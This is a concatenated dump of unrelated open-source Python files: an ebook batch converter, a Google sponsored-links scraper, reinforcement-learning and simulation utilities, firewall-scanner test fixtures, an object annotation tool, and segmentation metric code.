max_stars_repo_path (string, 4-245 chars) | max_stars_repo_name (string, 7-115 chars) | max_stars_count (int64, 101-368k) | id (string, 2-8 chars) | content (string, 6-1.03M chars)
---|---|---|---|---|
recipes/Python/579056_Run_OS_commtimeout_list_files__using_several/recipe-579056.py | tdiprima/code | 2,023 | 12690266 | <reponame>tdiprima/code
#process a filtered list of files by repeatedly calling a
#console app (no console window opens) in two parallel threads, with a timeout
#<NAME> 2015
import os
import threading
import subprocess
def my_thread():
global files,path,timeout,options
myname= threading.currentThread().getName()
while files:
#create command to run
nextfile=files.pop()
#print name of thread and command being run
print('Thread {0} starts processing {1}'.format(myname,nextfile))
f=path + nextfile + options
try:
#timeout interrupts a frozen command; shell=True doesn't open a console window
subprocess.check_call(args=f, shell=True, timeout=timeout)
except subprocess.TimeoutExpired:
print('Thread {0} processing {1} took too long'.format(myname,nextfile))
except subprocess.CalledProcessError as e:
print ('Thread {0} Processing {1} returned error {2}:{3}'.format(myname,nextfile,e.returncode,e.output))
except Exception as e:
print ('Thread {0} Processing {1} returned error {2}'.format(myname,nextfile,type(e).__name__))
print ('thread {0} stopped'.format(myname))
timeout=150
#the path to the console app
exe_path = '\"C:/Program files/Calibre2/ebook-convert.exe" '
file_path = './' # so it can be called from a console opened in the folder where the files are
options = '\" .epub > nul'
#filter the files in file_path
extensions = ['mobi', 'lit', 'prc', 'azw', 'rtf', 'odf']
files = [fn for fn in os.listdir(file_path) if any(fn.endswith(ext) for ext in extensions)]
path=exe_path +' \"'+file_path
#runs the same thread twice, each with a name
t1= threading.Thread(target=my_thread, name='uno' )
t1.start()
t2= threading.Thread(target=my_thread,name='dos' )
t2.start()
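# --- Illustrative sketch (not part of the original recipe): the same "pool of workers
# draining a shared file list" idea, expressed with concurrent.futures so thread creation
# and joining are handled for us. The executable path and the ".epub" output suffix are
# assumptions carried over from the recipe above.
import concurrent.futures

def convert(src, exe='"C:/Program files/Calibre2/ebook-convert.exe"', timeout=150):
    # Build a command line of the same shape as the recipe: exe "input" "output.epub"
    cmd = '%s "%s" "%s.epub"' % (exe, src, src)
    try:
        subprocess.check_call(cmd, shell=True, timeout=timeout)
        return src, 'ok'
    except subprocess.TimeoutExpired:
        return src, 'timeout'
    except subprocess.CalledProcessError as e:
        return src, 'error %d' % e.returncode

def convert_all(file_list, workers=2):
    # Two workers mirrors the two explicit threads used above.
    with concurrent.futures.ThreadPoolExecutor(max_workers=workers) as pool:
        for name, status in pool.map(convert, file_list):
            print(name, status)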
|
GoogleSearchKeyword/xgoogle/sponsoredlinks.py | imaging8896/google-parse | 109 | 12690269 | #!/usr/bin/python
#
# <NAME> (<EMAIL>)
# http://www.catonmat.net -- good coders code, great reuse
#
# http://www.catonmat.net/blog/python-library-for-google-sponsored-links-search/
#
# Code is licensed under MIT license.
#
import re
import urllib
import random
from htmlentitydefs import name2codepoint
from BeautifulSoup import BeautifulSoup
from browser import Browser, BrowserError
#
# TODO: join GoogleSearch and SponsoredLinks classes under a single base class
#
class SLError(Exception):
""" Sponsored Links Error """
pass
class SLParseError(Exception):
"""
Parse error in Google results.
self.msg attribute contains explanation why parsing failed
self.tag attribute contains BeautifulSoup object with the most relevant tag that failed to parse
Thrown only in debug mode
"""
def __init__(self, msg, tag):
self.msg = msg
self.tag = tag
def __str__(self):
return self.msg
def html(self):
return self.tag.prettify()
GET_ALL_SLEEP_FUNCTION = object()
class SponsoredLink(object):
""" a single sponsored link """
def __init__(self, title, url, display_url, desc):
self.title = title
self.url = url
self.display_url = display_url
self.desc = desc
class SponsoredLinks(object):
SEARCH_URL_0 = "http://www.google.com/sponsoredlinks?q=%(query)s&btnG=Search+Sponsored+Links&hl=en"
NEXT_PAGE_0 = "http://www.google.com/sponsoredlinks?q=%(query)s&sa=N&start=%(start)d&hl=en"
SEARCH_URL_1 = "http://www.google.com/sponsoredlinks?q=%(query)s&num=%(num)d&btnG=Search+Sponsored+Links&hl=en"
NEXT_PAGE_1 = "http://www.google.com/sponsoredlinks?q=%(query)s&num=%(num)d&sa=N&start=%(start)d&hl=en"
def __init__(self, query, random_agent=False, debug=False):
self.query = query
self.debug = debug
self.browser = Browser(debug=debug)
self._page = 0
self.eor = False
self.results_info = None
self._results_per_page = 10
if random_agent:
self.browser.set_random_user_agent()
@property
def num_results(self):
if not self.results_info:
page = self._get_results_page()
self.results_info = self._extract_info(page)
if self.results_info['total'] == 0:
self.eor = True
return self.results_info['total']
def _get_results_per_page(self):
return self._results_per_page
def _set_results_per_page(self, rpp):
self._results_per_page = rpp
results_per_page = property(_get_results_per_page, _set_results_per_page)
def get_results(self):
if self.eor:
return []
page = self._get_results_page()
info = self._extract_info(page)
if self.results_info is None:
self.results_info = info
if info['to'] == info['total']:
self.eor = True
results = self._extract_results(page)
if not results:
self.eor = True
return []
self._page += 1
return results
def _get_all_results_sleep_fn(self):
return random.random()*5 + 1 # sleep from 1 - 6 seconds
def get_all_results(self, sleep_function=None):
if sleep_function is GET_ALL_SLEEP_FUNCTION:
sleep_function = self._get_all_results_sleep_fn
if sleep_function is None:
sleep_function = lambda: None
ret_results = []
while True:
res = self.get_results()
if not res:
return ret_results
ret_results.extend(res)
return ret_results
def _maybe_raise(self, cls, *arg):
if self.debug:
raise cls(*arg)
def _extract_info(self, soup):
empty_info = { 'from': 0, 'to': 0, 'total': 0 }
stats_span = soup.find('span', id='stats')
if not stats_span:
return empty_info
txt = ''.join(stats_span.findAll(text=True))
txt = txt.replace(',', '').replace(" ", ' ')
matches = re.search(r'Results (\d+) - (\d+) of (?:about )?(\d+)', txt)
if not matches:
return empty_info
return {'from': int(matches.group(1)), 'to': int(matches.group(2)), 'total': int(matches.group(3))}
def _get_results_page(self):
if self._page == 0:
if self._results_per_page == 10:
url = SponsoredLinks.SEARCH_URL_0
else:
url = SponsoredLinks.SEARCH_URL_1
else:
if self._results_per_page == 10:
url = SponsoredLinks.NEXT_PAGE_0
else:
url = SponsoredLinks.NEXT_PAGE_1
safe_url = url % { 'query': urllib.quote_plus(self.query),
'start': self._page * self._results_per_page,
'num': self._results_per_page }
try:
page = self.browser.get_page(safe_url)
except BrowserError, e:
raise SLError, "Failed getting %s: %s" % (e.url, e.error)
return BeautifulSoup(page)
def _extract_results(self, soup):
results = soup.findAll('div', {'class': 'g'})
ret_res = []
for result in results:
eres = self._extract_result(result)
if eres:
ret_res.append(eres)
return ret_res
def _extract_result(self, result):
title, url = self._extract_title_url(result)
display_url = self._extract_display_url(result) # Warning: removes 'cite' from the result
desc = self._extract_description(result)
if not title or not url or not display_url or not desc:
return None
return SponsoredLink(title, url, display_url, desc)
def _extract_title_url(self, result):
title_a = result.find('a')
if not title_a:
self._maybe_raise(SLParseError, "Title tag in sponsored link was not found", result)
return None, None
title = ''.join(title_a.findAll(text=True))
title = self._html_unescape(title)
url = title_a['href']
match = re.search(r'q=(http[^&]+)&', url)
if not match:
self._maybe_raise(SLParseError, "URL inside a sponsored link was not found", result)
return None, None
url = urllib.unquote(match.group(1))
return title, url
def _extract_display_url(self, result):
cite = result.find('cite')
if not cite:
self._maybe_raise(SLParseError, "<cite> not found inside result", result)
return None
return ''.join(cite.findAll(text=True))
def _extract_description(self, result):
cite = result.find('cite')
if not cite:
return None
cite.extract()
desc_div = result.find('div', {'class': 'line23'})
if not desc_div:
self._maybe_raise(SLParseError, "Description tag not found in sponsored link", result)
return None
desc_strs = desc_div.findAll(text=True)[0:-1]
desc = ''.join(desc_strs)
desc = desc.replace("\n", " ")
desc = desc.replace(" ", " ")
return self._html_unescape(desc)
def _html_unescape(self, str):
def entity_replacer(m):
entity = m.group(1)
if entity in name2codepoint:
return unichr(name2codepoint[entity])
else:
return m.group(0)
def ascii_replacer(m):
cp = int(m.group(1))
if cp <= 255:
return unichr(cp)
else:
return m.group(0)
s = re.sub(r'&#(\d+);', ascii_replacer, str, flags=re.U)
return re.sub(r'&([^;]+);', entity_replacer, s, flags=re.U)
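# --- Illustrative usage sketch (not part of the original module). It assumes the legacy
# Python 2 dependencies imported above (BeautifulSoup 3 and the bundled browser module)
# are available; the query string is made up for the example.
if __name__ == "__main__":
    sl = SponsoredLinks("web hosting", random_agent=True)
    print("about %d sponsored results" % sl.num_results)
    for link in sl.get_all_results():
        print("%s -> %s" % (link.title, link.url))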
|
utils/game_utils.py | morozig/muzero | 111 | 12690289 | <gh_stars>100-1000
"""
File to define utilities for Game handling. The GameState data structures serve as the states that preserve the
information of an environment and is used within the Coach classes to handle environment data.
"""
from dataclasses import dataclass
import typing
import gym
from gym import Env, spaces
from gym.envs.atari import AtariEnv
import numpy as np
@dataclass
class GameState:
canonical_state: typing.Any # s_t
observation: np.ndarray # o_t
action: int # a_t
player: int # player_t
done: bool # I(s_t = s_T)
@dataclass
class GymState(GameState):
env: Env # Class for the (stateful) logic of Gym Environments at t.
@dataclass
class AtariState(GymState):
env: AtariEnv # Class for the (stateful) logic of Gym Atari Environments at t.
class DiscretizeAction(gym.ActionWrapper):
"""
Factorizes a continuous action space of an environment into n discrete actions.
"""
def __init__(self, env, n: int) -> None:
"""
Factorize the given environment's action space (a single continuous action) to n discrete actions.
:param env: Gym.Env Environment object from OpenAI Gym.
:param n: int Number of actions to factorize.
"""
assert isinstance(env.action_space, spaces.Box), (
"expected Box action space, got {}".format(type(env.action_space)))
assert env.action_space.is_bounded(), "expected bounded Box action space"
# We could support multiple dimensions, but that quickly becomes unmanageable with
# the single-dimension spaces.Discrete. We can add a version using
# spaces.MultiDiscrete for that use case.
dims = np.product(env.action_space.shape)
assert dims == 1, f"expected 1d Box action space, got {dims}d space"
super(DiscretizeAction, self).__init__(env)
self.action_space = spaces.Discrete(n)
def action(self, action: int) -> float:
"""
Linearly scale the action integer between the continuous range.
Example: if the range is [-1, 1] and n = 3, then a=0 -> -1.0, a=1 -> 0.0, a=2 -> 1.0.
:param action: int Action bin to perform in the environment.
:return: float Action cast to the original, continuous, action space.
"""
low = self.env.action_space.low
high = self.env.action_space.high
action = low + (high - low) * action / (self.action_space.n - 1)
return action
def reverse_action(self, action: float) -> int:
""" Yield the closest bin action to the given continuous action. TODO """
pass
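# --- Illustrative usage sketch (not part of the original file). "Pendulum-v1" is only an
# example of a bounded one-dimensional continuous-action environment; any such env works.
if __name__ == "__main__":
    env = DiscretizeAction(gym.make("Pendulum-v1"), n=5)
    print(env.action_space)  # Discrete(5)
    for a in range(env.action_space.n):
        # Bin 0 maps to the Box lower bound, bin n-1 to the upper bound.
        print(a, "->", env.action(a))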
|
ptan/common/utils.py | ChengUVa/ptan | 492 | 12690319 | <reponame>ChengUVa/ptan
import sys
import time
import operator
from datetime import timedelta
import numpy as np
import collections
import torch
import torch.nn as nn
class SMAQueue:
"""
Queue of fixed size with mean, max, min operations
"""
def __init__(self, size):
self.queue = collections.deque()
self.size = size
def __iadd__(self, other):
if isinstance(other, (list, tuple)):
self.queue.extend(other)
else:
self.queue.append(other)
while len(self.queue) > self.size:
self.queue.popleft()
return self
def __len__(self):
return len(self.queue)
def __repr__(self):
return "SMAQueue(size=%d)" % self.size
def __str__(self):
return "SMAQueue(size=%d, len=%d)" % (self.size, len(self.queue))
def min(self):
if not self.queue:
return None
return np.min(self.queue)
def mean(self):
if not self.queue:
return None
return np.mean(self.queue)
def max(self):
if not self.queue:
return None
return np.max(self.queue)
class SpeedMonitor:
def __init__(self, batch_size, autostart=True):
self.batch_size = batch_size
self.start_ts = None
self.batches = None
self.epoches = None
if autostart:
self.reset()
def epoch(self):
if self.epoches is not None:
self.epoches += 1
def batch(self):
if self.batches is not None:
self.batches += 1
def reset(self):
self.start_ts = time.time()
self.batches = 0
self.epoches = 0
def seconds(self):
"""
Seconds since last reset
:return:
"""
return time.time() - self.start_ts
def samples_per_sec(self):
"""
Calculate samples per second since last reset() call
:return: float count samples per second or None if not started
"""
if self.start_ts is None:
return None
secs = self.seconds()
if abs(secs) < 1e-5:
return 0.0
return (self.batches + 1) * self.batch_size / secs
def epoch_time(self):
"""
Calculate average epoch time
:return: timedelta object
"""
if self.start_ts is None:
return None
s = self.seconds()
if self.epoches > 0:
s /= self.epoches + 1
return timedelta(seconds=s)
def batch_time(self):
"""
Calculate average batch time
:return: timedelta object
"""
if self.start_ts is None:
return None
s = self.seconds()
if self.batches > 0:
s /= self.batches + 1
return timedelta(seconds=s)
class WeightedMSELoss(nn.Module):
def __init__(self, size_average=True):
super(WeightedMSELoss, self).__init__()
self.size_average = size_average
def forward(self, input, target, weights=None):
if weights is None:
return nn.MSELoss(self.size_average)(input, target)
loss_rows = (input - target) ** 2
if len(loss_rows.size()) != 1:
loss_rows = torch.sum(loss_rows, dim=1)
res = (weights * loss_rows).sum()
if self.size_average:
res /= len(weights)
return res
class SegmentTree(object):
def __init__(self, capacity, operation, neutral_element):
"""Build a Segment Tree data structure.
https://en.wikipedia.org/wiki/Segment_tree
Can be used as regular array, but with two
important differences:
a) setting item's value is slightly slower.
It is O(lg capacity) instead of O(1).
b) user has access to an efficient `reduce`
operation which reduces `operation` over
a contiguous subsequence of items in the
array.
Parameters
---------
capacity: int
Total size of the array - must be a power of two.
operation: lambda obj, obj -> obj
an operation for combining elements (e.g. sum, max);
must form a mathematical group together with the set of
possible values for array elements.
neutral_element: obj
neutral element for the operation above. eg. float('-inf')
for max and 0 for sum.
"""
assert capacity > 0 and capacity & (capacity - 1) == 0, "capacity must be positive and a power of 2."
self._capacity = capacity
self._value = [neutral_element for _ in range(2 * capacity)]
self._operation = operation
def _reduce_helper(self, start, end, node, node_start, node_end):
if start == node_start and end == node_end:
return self._value[node]
mid = (node_start + node_end) // 2
if end <= mid:
return self._reduce_helper(start, end, 2 * node, node_start, mid)
else:
if mid + 1 <= start:
return self._reduce_helper(start, end, 2 * node + 1, mid + 1, node_end)
else:
return self._operation(
self._reduce_helper(start, mid, 2 * node, node_start, mid),
self._reduce_helper(mid + 1, end, 2 * node + 1, mid + 1, node_end)
)
def reduce(self, start=0, end=None):
"""Returns result of applying `self.operation`
to a contiguous subsequence of the array.
self.operation(arr[start], operation(arr[start+1], operation(... arr[end])))
Parameters
----------
start: int
beginning of the subsequence
end: int
end of the subsequences
Returns
-------
reduced: obj
result of reducing self.operation over the specified range of array elements.
"""
if end is None:
end = self._capacity
if end < 0:
end += self._capacity
end -= 1
return self._reduce_helper(start, end, 1, 0, self._capacity - 1)
def __setitem__(self, idx, val):
# index of the leaf
idx += self._capacity
self._value[idx] = val
idx //= 2
while idx >= 1:
self._value[idx] = self._operation(
self._value[2 * idx],
self._value[2 * idx + 1]
)
idx //= 2
def __getitem__(self, idx):
assert 0 <= idx < self._capacity
return self._value[self._capacity + idx]
class SumSegmentTree(SegmentTree):
def __init__(self, capacity):
super(SumSegmentTree, self).__init__(
capacity=capacity,
operation=operator.add,
neutral_element=0.0
)
def sum(self, start=0, end=None):
"""Returns arr[start] + ... + arr[end]"""
return super(SumSegmentTree, self).reduce(start, end)
def find_prefixsum_idx(self, prefixsum):
"""Find the highest index `i` in the array such that
sum(arr[0] + arr[1] + ... + arr[i - 1]) <= prefixsum
if array values are probabilities, this function
allows to sample indexes according to the discrete
probability efficiently.
Parameters
----------
prefixsum: float
upperbound on the sum of array prefix
Returns
-------
idx: int
highest index satisfying the prefixsum constraint
"""
assert 0 <= prefixsum <= self.sum() + 1e-5
idx = 1
while idx < self._capacity: # while non-leaf
if self._value[2 * idx] > prefixsum:
idx = 2 * idx
else:
prefixsum -= self._value[2 * idx]
idx = 2 * idx + 1
return idx - self._capacity
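# --- Illustrative sketch (not part of ptan): how find_prefixsum_idx supports proportional
# sampling, as used in prioritized replay buffers. Leaf values act as unnormalized
# probabilities; a uniform draw in [0, tree.sum()) mapped through find_prefixsum_idx picks
# each leaf with probability value/total.
def _sum_tree_demo():
    tree = SumSegmentTree(capacity=4)
    for i, v in enumerate([1.0, 2.0, 3.0, 4.0]):
        tree[i] = v
    assert tree.sum() == 10.0
    assert tree.find_prefixsum_idx(0.5) == 0   # inside the first 1.0 of mass
    assert tree.find_prefixsum_idx(2.5) == 1   # 1.0 <= 2.5 < 1.0 + 2.0
    assert tree.find_prefixsum_idx(9.9) == 3   # near the top of the total mass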
class MinSegmentTree(SegmentTree):
def __init__(self, capacity):
super(MinSegmentTree, self).__init__(
capacity=capacity,
operation=min,
neutral_element=float('inf')
)
def min(self, start=0, end=None):
"""Returns min(arr[start], ..., arr[end])"""
return super(MinSegmentTree, self).reduce(start, end)
class TBMeanTracker:
"""
TensorBoard value tracker: allows to batch fixed amount of historical values and write their mean into TB
Designed and tested with pytorch-tensorboard in mind
"""
def __init__(self, writer, batch_size):
"""
:param writer: writer with close() and add_scalar() methods
:param batch_size: integer size of batch to track
"""
assert isinstance(batch_size, int)
assert writer is not None
self.writer = writer
self.batch_size = batch_size
def __enter__(self):
self._batches = collections.defaultdict(list)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.writer.close()
@staticmethod
def _as_float(value):
assert isinstance(value, (float, int, np.ndarray, np.generic, torch.autograd.Variable)) or torch.is_tensor(value)
tensor_val = None
if isinstance(value, torch.autograd.Variable):
tensor_val = value.data
elif torch.is_tensor(value):
tensor_val = value
if tensor_val is not None:
return tensor_val.float().mean().item()
elif isinstance(value, np.ndarray):
return float(np.mean(value))
else:
return float(value)
def track(self, param_name, value, iter_index):
assert isinstance(param_name, str)
assert isinstance(iter_index, int)
data = self._batches[param_name]
data.append(self._as_float(value))
if len(data) >= self.batch_size:
self.writer.add_scalar(param_name, np.mean(data), iter_index)
data.clear()
class RewardTracker:
def __init__(self, writer, min_ts_diff=1.0):
"""
Constructs RewardTracker
:param writer: writer to use for writing stats
:param min_ts_diff: minimal time difference to track speed
"""
self.writer = writer
self.min_ts_diff = min_ts_diff
def __enter__(self):
self.ts = time.time()
self.ts_frame = 0
self.total_rewards = []
return self
def __exit__(self, *args):
self.writer.close()
def reward(self, reward, frame, epsilon=None):
self.total_rewards.append(reward)
mean_reward = np.mean(self.total_rewards[-100:])
ts_diff = time.time() - self.ts
if ts_diff > self.min_ts_diff:
speed = (frame - self.ts_frame) / ts_diff
self.ts_frame = frame
self.ts = time.time()
epsilon_str = "" if epsilon is None else ", eps %.2f" % epsilon
print("%d: done %d episodes, mean reward %.3f, speed %.2f f/s%s" % (
frame, len(self.total_rewards), mean_reward, speed, epsilon_str
))
sys.stdout.flush()
self.writer.add_scalar("speed", speed, frame)
if epsilon is not None:
self.writer.add_scalar("epsilon", epsilon, frame)
self.writer.add_scalar("reward_100", mean_reward, frame)
self.writer.add_scalar("reward", reward, frame)
return mean_reward if len(self.total_rewards) > 30 else None
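# --- Illustrative usage sketch (not part of ptan). The SummaryWriter import and the dummy
# reward loop are assumptions made for the example; both trackers are context managers that
# close the writer on exit.
def _tracker_demo():
    from torch.utils.tensorboard import SummaryWriter
    writer = SummaryWriter(comment="-demo")
    with RewardTracker(writer) as reward_tracker, TBMeanTracker(writer, batch_size=10) as tb:
        for frame in range(1, 101):
            tb.track("loss", 0.1 * frame, frame)            # written as a mean every 10 values
            reward_tracker.reward(float(frame % 7), frame)   # fake per-episode reward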
|
tests/scanner/scanners/data/fake_firewall_rules.py | aarontp/forseti-security | 921 | 12690327 | <filename>tests/scanner/scanners/data/fake_firewall_rules.py
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test data for firewall rules scanners."""
FAKE_FIREWALL_RULE_FOR_TEST_PROJECT = {
'name': 'policy1',
'full_name': ('organization/org/folder/folder1/'
'project/project0/firewall/policy1/'),
'network': 'network1',
'direction': 'ingress',
'allowed': [{'IPProtocol': 'tcp', 'ports': ['1', '3389']}],
'sourceRanges': ['0.0.0.0/0'],
'targetTags': ['linux'],
}
FAKE_FIREWALL_RULE_FOR_PROJECT1 = {
'name': 'policy1',
'full_name':
('organization/org/folder/test_instances/'
'project/project1/firewall/policy1/'),
'network': 'network1',
'direction': 'ingress',
'allowed': [{'IPProtocol': 'tcp', 'ports': ['22']}],
'sourceRanges': ['172.16.58.3'],
'targetTags': ['test'],
} |
igibson/utils/data_utils/ext_object/scripts_wip/link_annotation_tool.py | suresh-guttikonda/iGibson | 360 | 12690364 | import itertools
import json
import os
import numpy as np
import pybullet as p
from bddl.object_taxonomy import ObjectTaxonomy
from pynput import keyboard
import igibson
from igibson.objects.articulated_object import URDFObject
from igibson.objects.visual_marker import VisualMarker
from igibson.scenes.empty_scene import EmptyScene
from igibson.simulator import Simulator
from igibson.utils.assets_utils import download_assets
download_assets()
ABILITY_NAME = "cleaningTool"
SYNSETS = [
"alarm.n.02",
"printer.n.03",
"facsimile.n.02",
"scanner.n.02",
"modem.n.01",
]
CATEGORIES = [
"broom",
"carpet_sweeper",
"scraper",
"scrub_brush",
"toothbrush",
"vacuum",
]
MODE = "synset" # one of "synset", "ability", "category"
LINK_NAME = "toggle_button"
IS_CUBOID = False
SKIP_EXISTING = False
OBJECT_TAXONOMY = ObjectTaxonomy()
def get_categories():
dir = os.path.join(igibson.ig_dataset_path, "objects")
return [cat for cat in os.listdir(dir) if os.path.isdir(get_category_directory(cat))]
def get_category_directory(category):
return os.path.join(igibson.ig_dataset_path, "objects", category)
def get_obj(folder):
return URDFObject(os.path.join(folder, os.path.basename(folder) + ".urdf"), name="obj", model_path=folder)
def get_metadata_filename(objdir):
return os.path.join(objdir, "misc", "metadata.json")
def get_corner_positions(base, rotation, size):
quat = p.getQuaternionFromEuler(rotation)
options = [-1, 1]
outputs = []
for pos in itertools.product(options, options, options):
res = p.multiplyTransforms(base, quat, np.array(pos) * size / 2.0, [0, 0, 0, 1])
outputs.append(res)
return outputs
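# --- Illustrative sketch (not part of the original tool): get_corner_positions returns the
# eight (position, orientation) pairs for the corners of a cuboid of the given size, centered
# at `base` and rotated by the given Euler angles. With zero rotation the corners are simply
# base +/- size / 2 along each axis. The DIRECT connection below is an assumption so the
# pybullet math utilities can run head-less.
def _corner_demo():
    p.connect(p.DIRECT)
    corners = get_corner_positions(base=[0, 0, 1], rotation=[0, 0, 0], size=np.array([0.2, 0.4, 0.6]))
    for pos, orn in corners:
        print(np.round(pos, 3), orn)  # e.g. [-0.1 -0.2  0.7] (0.0, 0.0, 0.0, 1.0)
    p.disconnect()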
def main():
# Collect the relevant categories.
categories = CATEGORIES
if MODE == "ability":
categories = []
for cat in get_categories():
# Check that the category has this label.
klass = OBJECT_TAXONOMY.get_class_name_from_igibson_category(cat)
if not klass:
continue
if not OBJECT_TAXONOMY.has_ability(klass, ABILITY_NAME):
continue
categories.append(cat)
elif MODE == "synset":
categories = []
for synset in SYNSETS:
categories.extend(OBJECT_TAXONOMY.get_igibson_categories(synset))
categories = set(categories) & set(get_categories())
print("%d categories: %s" % (len(categories), ", ".join(categories)))
# Now collect the actual objects.
objects = []
objects_by_category = {}
for cat in categories:
cd = get_category_directory(cat)
objects_by_category[cat] = []
for objdir in os.listdir(cd):
objdirfull = os.path.join(cd, objdir)
objects.append(objdirfull)
objects_by_category[cat].append(objdirfull)
print("%d objects.\n" % len(objects))
for cat in categories:
cd = get_category_directory(cat)
for objdir in os.listdir(cd):
objdirfull = os.path.join(cd, objdir)
mfn = get_metadata_filename(objdirfull)
with open(mfn, "r") as mf:
meta = json.load(mf)
offset = np.array([0.0, 0.0, 0.0])
size = np.array([0.0, 0.0, 0.0])
rotation = np.array([0.0, 0.0, 0.0])
existing = False
if "links" in meta and LINK_NAME in meta["links"]:
print("%s/%s already has the requested link." % (cat, objdir))
if SKIP_EXISTING:
continue
existing = True
offset = np.array(meta["links"][LINK_NAME]["xyz"])
if IS_CUBOID:
size = np.array(meta["links"][LINK_NAME]["size"])
rotation = np.array(meta["links"][LINK_NAME]["rpy"])
s = Simulator(mode="gui")
scene = EmptyScene()
s.import_scene(scene)
obj = get_obj(objdirfull)
s.import_object(obj)
obj_pos = np.array([0.0, 0.0, 1.0])
obj.set_position(obj_pos)
dim = max(obj.bounding_box)
marker_size = dim / 100.0
steps = [dim * 0.1, dim * 0.01, dim * 0.001]
rot_steps = [np.deg2rad(1), np.deg2rad(5), np.deg2rad(10)]
m = VisualMarker(radius=marker_size, rgba_color=[0, 0, 1, 0.5])
s.import_object(m)
if IS_CUBOID:
initial_poses = get_corner_positions(obj_pos + offset, rotation, size)
markers = [VisualMarker(radius=marker_size, rgba_color=[0, 1, 0, 0.5]) for _ in initial_poses]
[s.import_object(m) for m in markers]
for marker, (pos, orn) in zip(markers, initial_poses):
marker.set_position_orientation(pos, orn)
# if existing:
# e = VisualMarker(radius=0.02, rgba_color=[1, 0, 0, 0.5])
# s.import_object(e)
# e.set_position(obj_pos + offset)
step_size = steps[1]
rot_step_size = rot_steps[1]
done = False
while not done:
with keyboard.Events() as events:
for event in events:
if (
event is None
or not isinstance(event, keyboard.Events.Press)
or not hasattr(event.key, "char")
):
continue
if event.key.char == "w":
print("Moving forward one")
offset += np.array([0, 1, 0]) * step_size
elif event.key.char == "a":
print("Moving left one")
offset += np.array([-1, 0, 0]) * step_size
elif event.key.char == "s":
print("Moving back one")
offset += np.array([0, -1, 0]) * step_size
elif event.key.char == "d":
print("Moving right one")
offset += np.array([1, 0, 0]) * step_size
elif event.key.char == "q":
print("Moving up one")
offset += np.array([0, 0, 1]) * step_size
elif event.key.char == "z":
print("Moving down one")
offset += np.array([0, 0, -1]) * step_size
elif event.key.char == "1":
print("Sizing forward one")
size += np.array([0, 1, 0]) * step_size
elif event.key.char == "2":
print("Sizing back one")
size += np.array([0, -1, 0]) * step_size
elif event.key.char == "4":
print("Sizing left one")
size += np.array([-1, 0, 0]) * step_size
elif event.key.char == "5":
print("Sizing right one")
size += np.array([1, 0, 0]) * step_size
elif event.key.char == "7":
print("Sizing up one")
size += np.array([0, 0, 1]) * step_size
elif event.key.char == "8":
print("Sizing down one")
size += np.array([0, 0, -1]) * step_size
elif event.key.char == "t":
print("Rotation +X one")
rotation += np.array([1, 0, 0]) * rot_step_size
elif event.key.char == "y":
print("Rotation -X one")
rotation += np.array([-1, 0, 0]) * rot_step_size
elif event.key.char == "u":
print("Rotation +Y one")
rotation += np.array([0, 1, 0]) * rot_step_size
elif event.key.char == "i":
print("Rotation -Y one")
rotation += np.array([0, -1, 0]) * rot_step_size
elif event.key.char == "o":
print("Rotation +Z one")
rotation += np.array([0, 0, 1]) * rot_step_size
elif event.key.char == "p":
print("Rotation -Z one")
rotation += np.array([0, 0, -1]) * rot_step_size
elif event.key.char == "h":
print("Step to 0.1")
step_size = steps[0]
rot_step_size = rot_steps[0]
elif event.key.char == "j":
print("Step to 0.01")
step_size = steps[1]
rot_step_size = rot_steps[1]
elif event.key.char == "k":
print("Step to 0.001")
step_size = steps[2]
rot_step_size = rot_steps[2]
elif event.key.char == "b":
print("Updating box to match bounding box.")
offset = np.array([0.0, 0.0, 0.0])
rotation = np.array([0.0, 0.0, 0.0])
size = np.array(obj.bounding_box, dtype=float)
elif event.key.char == "c":
done = True
break
print("New position:", offset)
m.set_position(obj_pos + offset)
if IS_CUBOID:
print("New rotation:", rotation)
print("New size:", size)
print("")
poses = get_corner_positions(obj_pos + offset, rotation, size)
for marker, (pos, orn) in zip(markers, poses):
marker.set_position_orientation(pos, orn)
# Record it into the meta file.
if "links" not in meta:
meta["links"] = dict()
dynamics_info = p.getDynamicsInfo(obj.get_body_id(), -1)
inertial_pos, inertial_orn = dynamics_info[3], dynamics_info[4]
rel_position, rel_orn = p.multiplyTransforms(
offset, p.getQuaternionFromEuler(rotation), inertial_pos, inertial_orn
)
if IS_CUBOID:
meta["links"][LINK_NAME] = {
"geometry": "box",
"size": list(size),
"xyz": list(rel_position),
"rpy": list(p.getEulerFromQuaternion(rel_orn)),
}
else:
meta["links"][LINK_NAME] = {"geometry": None, "size": None, "xyz": list(rel_position), "rpy": None}
with open(mfn, "w") as mf:
json.dump(meta, mf)
print("Updated %s" % mfn)
input("Hit enter to continue.")
s.disconnect()
if __name__ == "__main__":
main()
|
eval/segment_metrics.py | swafe/DeepSegmentor | 150 | 12690385 | # Author: <NAME> <<EMAIL>>
"""
Calculate Segmentation metrics:
- GlobalAccuracy
- MeanAccuracy
- Mean IoU
"""
import numpy as np
from data_io import imread
def cal_semantic_metrics(pred_list, gt_list, thresh_step=0.01, num_cls=2):
final_accuracy_all = []
for thresh in np.arange(0.0, 1.0, thresh_step):
print(thresh)
global_accuracy_cur = []
statistics = []
for pred, gt in zip(pred_list, gt_list):
gt_img = (gt/255).astype('uint8')
pred_img = (pred/255 > thresh).astype('uint8')
# calculate each image
global_accuracy_cur.append(cal_global_acc(pred_img, gt_img))
statistics.append(get_statistics(pred_img, gt_img, num_cls))
# get global accuracy with corresponding threshold: (TP+TN)/all_pixels
global_acc = np.sum([v[0] for v in global_accuracy_cur])/np.sum([v[1] for v in global_accuracy_cur])
# get tp, fp, fn
counts = []
for i in range(num_cls):
tp = np.sum([v[i][0] for v in statistics])
fp = np.sum([v[i][1] for v in statistics])
fn = np.sum([v[i][2] for v in statistics])
counts.append([tp, fp, fn])
# calculate mean accuracy
mean_acc = np.sum([v[0]/(v[0]+v[2]) for v in counts])/num_cls
# calculate mean iou
mean_iou_acc = np.sum([v[0]/(np.sum(v)) for v in counts])/num_cls
final_accuracy_all.append([thresh, global_acc, mean_acc, mean_iou_acc])
return final_accuracy_all
def cal_global_acc(pred, gt):
"""
acc = (TP+TN)/all_pixels
"""
h,w = gt.shape
return [np.sum(pred==gt), float(h*w)]
